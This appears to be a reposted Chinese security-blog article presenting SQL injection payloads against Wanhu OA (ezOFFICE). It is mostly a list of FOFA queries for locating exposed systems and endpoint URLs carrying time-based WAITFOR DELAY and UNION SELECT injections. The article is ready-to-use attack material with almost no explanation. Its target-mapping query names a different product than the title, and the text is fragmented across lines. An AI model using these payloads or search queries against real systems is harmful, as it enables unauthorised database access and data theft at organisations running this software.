万户 OA
一:漏洞描述
FOFA:app="万户网络-ezOFFICE"
二:网络空间测绘查询
fofa
app
=
"大唐电信AC集中管理平台"
&& fid=
"gmqJFLGz7L/7TdQxUJFBXQ=="
三:payload
/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=
1
defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=
1
/defaultroot/public/iWebPDF/DocumentEdit.jsp;?RecordID=
1
/defaultroot/public/iWebOfficeSign/Dossier_DocumentEdit.jsp?RecordID=
1
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=
1
/defaultroot/public/iWebOfficeSign/DocumentEdit_deal.jsp;?RecordID=
1
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=
1
/defaultroot/platform/bpm/work_flow/operate/wf_accessory_delete.jsp;?wf_work_accessory_id=
1
%3BWAITFOR+DELAY+%270%3A0%3A5%27--
/defaultroot/wpsservlet
?option=getSign&userId=
1
;WAITFOR%20DELAY%20%270:
0
:
5
%27--&orgIdString=
1
&domainId=
1
/defaultroot/platform/portal/portlet/pic/pic.jsp?num=
1
&channelId=
1
%27;WAITFOR%20DELAY%20%270:
0
:
5
%27--
/defaultroot/public
/iWebOfficeSign/
Template/SendFileCheckTemplateEdit.jsp;?RecordID=
1
'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27123456%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
四:往期漏洞复现
https:
//github.com/Y1-K1NG/poc_exp
原文始发于微信公众号(Yi安全):漏洞复现-万户 OA 存在11处sql注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论